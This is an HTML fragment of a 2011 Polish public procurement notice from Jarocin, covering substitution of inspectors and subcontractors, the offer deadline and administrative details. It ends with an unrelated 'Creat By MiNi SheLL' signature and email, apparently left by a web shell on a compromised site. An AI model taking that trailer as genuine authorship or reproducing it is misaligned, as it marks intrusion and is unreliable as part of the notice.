Osoby inspektora nadzoru - Zamawiający może zmienić inspektora nadzoru na prośbę samego inspektora oraz z przyczyn niezależnych od niego, tj. zdarzeń losowych (śmierć, choroba, zwolnienie) przy czym osoba zastępująca pierwotnego inspektora będzie posiadała uprawnienia nie gorsze od niego.
Podwykonawcy - Wykonawca może zmienić Podwykonawcę na prośbę samego Podwykonawcy oraz w przypadku niewywiązywania się Podwykonawcy z powierzonych mu przez Wykonawcę części przedmiotu zamówienia objętego przedmiotem zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jarocin.pl   - (zakładka BIP)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jarociński Fundusz Poręczeń Kredytowych Sp. z o.o. ul. T. Kościuszki 15B, 63-200 Jarocin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.12.2011 godzina 09:00, miejsce: Urząd Miejski w Jarocinie - Sekretariat, pok. nr 32, Al. Niepodległości 10, 63-200 Jarocin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com